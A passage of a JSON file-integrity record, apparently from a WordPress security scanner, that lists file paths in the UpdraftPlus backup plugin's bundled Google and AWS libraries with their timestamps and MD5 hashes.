h\":\"bffda0decadf98ad09d77a67bb28fa98\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Verifier\\/Pem.php\":{\"d\":1545638163,\"h\":\"f5ff23db55e103b5e2db99d42a8040fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Verifier\\/Abstract.php\":{\"d\":1545638163,\"h\":\"1d71ba9df985da107ad727908a8a4ecb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Http\\/Request.php\":{\"d\":1545638163,\"h\":\"99779c816397c32cd026d230cc3bde64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Http\\/Batch.php\":{\"d\":1545638163,\"h\":\"93eb9f356b6b4cbcf6fdbc1926dbde88\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Http\\/MediaFileUpload.php\":{\"d\":1545638163,\"h\":\"1637b7676d802930acec9eef5508ee95\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Http\\/CacheParser.php\":{\"d\":1545638163,\"h\":\"77c516c34f54d37c132074b16824f278\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Http\\/REST.php\":{\"d\":1545638163,\"h\":\"bbf5b9ee5255e4228a9f9e6650964a7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Cache\\/Abstract.php\":{\"d\":1545638163,\"h\":\"99e51011a700c21dbe8c5d2739e3777f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Cache\\/Exception.php\":{\"d\":1545638163,\"h\":\"8055f872cb2a7695c3e04f78ab047166\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Cache\\/Memcache.php\":{\"d\":1545638163,\"h\":\"965391ca4735f4e4f6de8fcbef7d722b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Cache\\/Null.php\":{\"d\":1545638163,\"h\":\"b888f3d054704638fdcd278cd9abc68b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Cache\\/Apc.php\":{\"d\":1545638163,\"h\":\"4a595e56a6c419ebad142a4ac7b15ef3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Cache\\/File.php\":{\"d\":1545638163,\"h\":\"56c084ec51850e7e6c3ca324d319f154\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Signer\\/P12.php\":{\"d\":1545638163,\"h\":\"85915452e42b8636181ceacd7c8b38e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Signer\\/Abstract.php\":{\"d\":1545638163,\"h\":\"ae819136b6bf530bccee81f993f45793\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Task\\/Exception.php\":{\"d\":1545638163,\"h\":\"62349c381de5f609914249dfd1245ad5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Task\\/Runner.php\":{\"d\":1545638163,\"h\":\"0efd7b612285a2c35a2a84ff2f441e66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Task\\/Retryable.php\":{\"d\":1545638163,\"h\":\"fd80f21d711c8b658815cc53e88a340b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/IO\\/cacerts.pem\":{\"d\":1545638163,\"h\":\"a527b93e71b94759d99643641ff3b531\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/IO\\/Stream.php\":{\"d\":1545638163,\"h\":\"8d866e1b07045c9a8bbf3c9840deef20\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/IO\\/Abstract.php\":{\"d\":1545638163,\"h\":\"f03b8a519e4a20823f603f2432722038\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/IO\\/Exception.php\":{\"d\":1545638163,\"h\":\"989937d4b02d8ebca1ba18957d0fdf36\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/IO\\/Curl.php\":{\"d\":1545638163,\"h\":\"08b23cad6ad06623802d945808d5c90f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Auth\\/OAuth2.php\":{\"d\":1545638163,\"h\":\"3b7a2a4ef2f4348ceb8397c984774099\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Auth\\/AppIdentity.php\":{\"d\":1545638163,\"h\":\"650aab096ac077d5a54dd230989202bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Auth\\/AssertionCredentials.php\":{\"d\":1545638163,\"h\":\"327ca7d376613dd1cfa7a25d891cdebc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Auth\\/Abstract.php\":{\"d\":1545638163,\"h\":\"5da872170e33938931a41c5670bd3d16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Auth\\/LoginTicket.php\":{\"d\":1545638163,\"h\":\"21b72be75cf2f8e1ef2933618ed30a63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Auth\\/Exception.php\":{\"d\":1545638163,\"h\":\"285e85ef412b20a11296f3eb4372b6a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Auth\\/Simple.php\":{\"d\":1545638163,\"h\":\"10e0e45068bc781833ab5822b1da36fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Auth\\/ComputeEngine.php\":{\"d\":1545638163,\"h\":\"cb48a5d14cede8ca98088e58732972a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Audit.php\":{\"d\":1545638163,\"h\":\"c90c3336e1c307a5214c9f6cb0658444\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Dns.php\":{\"d\":1545638163,\"h\":\"3cb9f9a83c6ad210072aee97ab14e28d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/IdentityToolkit.php\":{\"d\":1545638163,\"h\":\"2ea2da8b3d519e656548bb3f17f4a9d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Oauth2.php\":{\"d\":1545638163,\"h\":\"497962957934ad4d671663a4ce9e160b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Logging.php\":{\"d\":1545638163,\"h\":\"be2acce0a8414072be51889047581179\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Drive.php\":{\"d\":1545638163,\"h\":\"0c174136e26fd506f03692518748b001\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Groupssettings.php\":{\"d\":1545638163,\"h\":\"1c0a2db814d38b47cf78d1a075176d65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Storage.php\":{\"d\":1545638163,\"h\":\"6861ae08e93b782effce5e7ec97dd7e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Licensing.php\":{\"d\":1545638163,\"h\":\"bc432f6299c81f0872f2ec81418181e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Tasks.php\":{\"d\":1545638163,\"h\":\"9525b0dff3459a0b5b17597300d6bf1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Reports.php\":{\"d\":1545638163,\"h\":\"ea16a9fa61b89d84425519f29cee2d4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Resourceviews.php\":{\"d\":1545638163,\"h\":\"71564e2b5896d613de5ffbee9286c57f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Exception.php\":{\"d\":1545638163,\"h\":\"80af63452d5180e64af33796ce8e19fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Datastore.php\":{\"d\":1545638163,\"h\":\"067d86be76b8c6885a58f186d1cf5fc5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Resource.php\":{\"d\":1545638163,\"h\":\"50f1215e28d002284eb56934becbfeca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/GroupsMigration.php\":{\"d\":1545638163,\"h\":\"3df47de71191face9a2f1b3c029c8079\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Container.php\":{\"d\":1545638163,\"h\":\"5522ef4cba1318d67f9e3b73a8a7efa9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service\\/Directory.php\":{\"d\":1545638163,\"h\":\"fdd8f45902247f155dd2c16a3b7b9c4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Logger\\/Abstract.php\":{\"d\":1545638163,\"h\":\"7263a9a9bfa2d9feec395d8e88e07129\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Logger\\/Exception.php\":{\"d\":1545638163,\"h\":\"c3be97c23fc050aba291a37c7ceb3072\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Logger\\/Null.php\":{\"d\":1545638163,\"h\":\"9dc7ed69671ec82b201e33aafbb9adf4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Logger\\/Psr.php\":{\"d\":1545638163,\"h\":\"921dd7b30ccf807b5ca636b2cb077dcb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Logger\\/File.php\":{\"d\":1545638163,\"h\":\"d781f6385fb2f17017daccc640f17d7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Model.php\":{\"d\":1545638163,\"h\":\"47d6fda05780f9bba9f3cdc5b98a789f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Collection.php\":{\"d\":1545638163,\"h\":\"847913baf9f5e93678ce354df394d671\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/autoload.php\":{\"d\":1545638163,\"h\":\"f80bcbaa4f9fef432445fc39415321c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Client.php\":{\"d\":1545638163,\"h\":\"9212a23f9b6dca48c76f4192b1f605f1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Service.php\":{\"d\":1545638163,\"h\":\"c6a3edb979750d99b8581b4fc7f74e2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Exception.php\":{\"d\":1545638163,\"h\":\"318afca9f008d35a174bfd9dadc02ff2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Config.php\":{\"d\":1545638163,\"h\":\"6c85f1215738a2eef9b0d5a19c524d5d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/Google\\/Utils.php\":{\"d\":1545638163,\"h\":\"cabb63968b2b820423f4a0252afd1d61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-partialfileservlet.php\":{\"d\":1545638159,\"h\":\"81cf165fb0349099b92f084628011883\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jquery-ui.custom.min.css\":{\"d\":1545638159,\"h\":\"40cf3630dfdaf1f630955a5f51e0b271\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-updraft-dashboard-news.php\":{\"d\":1545638159,\"h\":\"3ca5e5fcb689c5a04d7c2d034584dffb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraftplus-login.php\":{\"d\":1545638159,\"h\":\"a54c38c5f4f66be5e3b6e5dc5bd3e656\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/S3.php\":{\"d\":1545638159,\"h\":\"eaf5b8f431350fff01200dc141a9d6ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jquery.blockUI.min.js\":{\"d\":1545638159,\"h\":\"9b92a7d82d22be1f091216931a3dc34c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-remote-send.php\":{\"d\":1545638159,\"h\":\"e4e1b7482c86b902b69924ba5b375adf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraft-admin-common.js\":{\"d\":1545638159,\"h\":\"613a16614ac49e83b25d25c08b1076d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraftcentral.php\":{\"d\":1545638159,\"h\":\"4d4ac3189f26d6f3d6ec9bc8f46f9e6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-zip.php\":{\"d\":1545638163,\"h\":\"512a8be81f638f9a323b3d521cc251fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-job-scheduler.php\":{\"d\":1545638163,\"h\":\"49d9a628d1e51886140faaa7325a4f33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/S3compat.php\":{\"d\":1545638163,\"h\":\"8786f95cb98315a95c70a8faeed8ac6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraftplus-tour.php\":{\"d\":1545638163,\"h\":\"241dd6d492f6008ad456b77ce0a1aa8d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-storage-methods-interface.php\":{\"d\":1545638163,\"h\":\"feea608d8ad3d9f6e013baf48368ffeb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraft-notices.php\":{\"d\":1545638163,\"h\":\"830392b8199817b5f28789c53a7f4ce1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jquery-ui.custom.min.css.map\":{\"d\":1545638163,\"h\":\"edad1f3dadcb309a807bfafe26df13da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/ftp.class.php\":{\"d\":1545638163,\"h\":\"f8787b586ccdeabf569e1f27de7e5d2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-commands.php\":{\"d\":1545638163,\"h\":\"72c7b1ddf7a0bd3c19554efb4f416e5f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/cacert.pem\":{\"d\":1545638163,\"h\":\"df0df092f7590ce0cc636986f1ae084b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-backup-history.php\":{\"d\":1545638163,\"h\":\"2ab010753d685ddf707ee686ab58fb7b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-semaphore.php\":{\"d\":1545638163,\"h\":\"147d22997c653b5efda13eaf7103eaec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraft-admin-common.min.js\":{\"d\":1545638163,\"h\":\"332718fc6be2a948d8219b31b74ed843\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/get-cpanel-quota-usage.pl\":{\"d\":1545638163,\"h\":\"778a02fcee1c33df6bdf9a1d948ce5f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraftplus-notices.php\":{\"d\":1545638163,\"h\":\"3de6c04e6154528925b9c7399550ff4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraftplus-clone.php\":{\"d\":1545638163,\"h\":\"ceb2d8b0923c744518dce553da72c139\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-manipulation-functions.php\":{\"d\":1545638163,\"h\":\"548dd73f91f9aadbff4a0325e8aeb246\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-udrpc.php\":{\"d\":1545638163,\"h\":\"365307aed57e1d5843034159dac9709d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jquery.blockUI.js\":{\"d\":1545638163,\"h\":\"5c98c0cbfacee6dab0783112cb0e233d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-filesystem-functions.php\":{\"d\":1545638163,\"h\":\"f5c7748e329ff5b614190df2afac6177\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-database-utility.php\":{\"d\":1545638163,\"h\":\"d892866f88a0fefd5e09e89f950662f1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-updraftplus-encryption.php\":{\"d\":1545638163,\"h\":\"364c9ab8dd574be7ed36dbfa8090b745\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-updraftcentral-updraftplus-commands.php\":{\"d\":1545638163,\"h\":\"ba8187865866f435043450e603f6ecf2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/jquery-ui.custom.css\":{\"d\":1545638163,\"h\":\"d29a820e727e85539b6a18d1ecc07ec0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/deprecated-actions.php\":{\"d\":1545638163,\"h\":\"f6c579a72bee6fc411587b500793c7a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/google-extensions.php\":{\"d\":1545638163,\"h\":\"2043a7b1437a58a939a0359b4a81940f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraft-restorer-skin.php\":{\"d\":1545638163,\"h\":\"04bf0779cb239b99d9d09103ebf73bb8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/class-wpadmin-commands.php\":{\"d\":1545638163,\"h\":\"1ef8f7eabf7d73e089162870d8f175de\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/includes\\/updraftvault.php\":{\"d\":1545638163,\"h\":\"f2a1ae055c789e026d0b2f7b71353b56\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/Parser\\/S3ExceptionParser.php\":{\"d\":1545638163,\"h\":\"8b11e6c2e0aab8b276cf2cd90e36fc63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidTokenException.php\":{\"d\":1545638163,\"h\":\"b21fb6f6445972b9c30d3bb566ace2de\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NoSuchVersionException.php\":{\"d\":1545638163,\"h\":\"85b88fa151a076d133d6c9515c0f8b56\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/TooManyBucketsException.php\":{\"d\":1545638163,\"h\":\"37840f4760fa1c45336f203543b39c3f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/IncompleteBodyException.php\":{\"d\":1545638163,\"h\":\"3868573f4b4169bd66ec7ed55e828212\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidSecurityException.php\":{\"d\":1545638163,\"h\":\"c5325d7ab1f09760b5cfb5dff1452cf5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/RequestIsNotMultiPartContentException.php\":{\"d\":1545638163,\"h\":\"9a233980787a08e6e8f946ecbaf44933\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidPolicyDocumentException.php\":{\"d\":1545638163,\"h\":\"24708723851ace58c30233fbcd2a61c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/S3Exception.php\":{\"d\":1545638163,\"h\":\"44d15cd57f1f8b5405f7776b636c9a4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MissingAttachmentException.php\":{\"d\":1545638163,\"h\":\"d89997a566746ebfafb220946f27a5a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/ObjectNotInActiveTierErrorException.php\":{\"d\":1545638163,\"h\":\"3ac099a476fa8cce2e0de5de51e81016\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NotSignedUpException.php\":{\"d\":1545638163,\"h\":\"812bae6a59981af1cade72c37ca87886\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/CredentialsNotSupportedException.php\":{\"d\":1545638163,\"h\":\"28e5df8a1f769a05c4b0c17da307c821\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/MaxMessageLengthExceededException.php\":{\"d\":1545638163,\"h\":\"e398b2a0c10de3a9ed33612647dceb5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NotImplementedException.php\":{\"d\":1545638163,\"h\":\"bfded76dd7733080fc05e35fc9b5d570\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/NoLoggingStatusForKeyException.php\":{\"d\":1545638163,\"h\":\"3b8655854d58f4a783e82b2b3dc7c1e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/TemporaryRedirectException.php\":{\"d\":1545638163,\"h\":\"d4e23dee2d180e598e4ab8562df97449\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/ObjectAlreadyInActiveTierErrorException.php\":{\"d\":1545638163,\"h\":\"f3c4ce492a49fe06caabecddd73658c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidRequestException.php\":{\"d\":1545638163,\"h\":\"dc44e8a1c168511de2b21dc9d0dcf26b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidPartOrderException.php\":{\"d\":1545638163,\"h\":\"2844134a42c3bf7250e00356a1af54c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/TokenRefreshRequiredException.php\":{\"d\":1545638163,\"h\":\"f3d13abdc5305ab7de861a85b9f2eeae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/aws\\/aws-sdk-php\\/src\\/Aws\\/S3\\/Exception\\/InvalidTargetBucketForLoggingException.php\"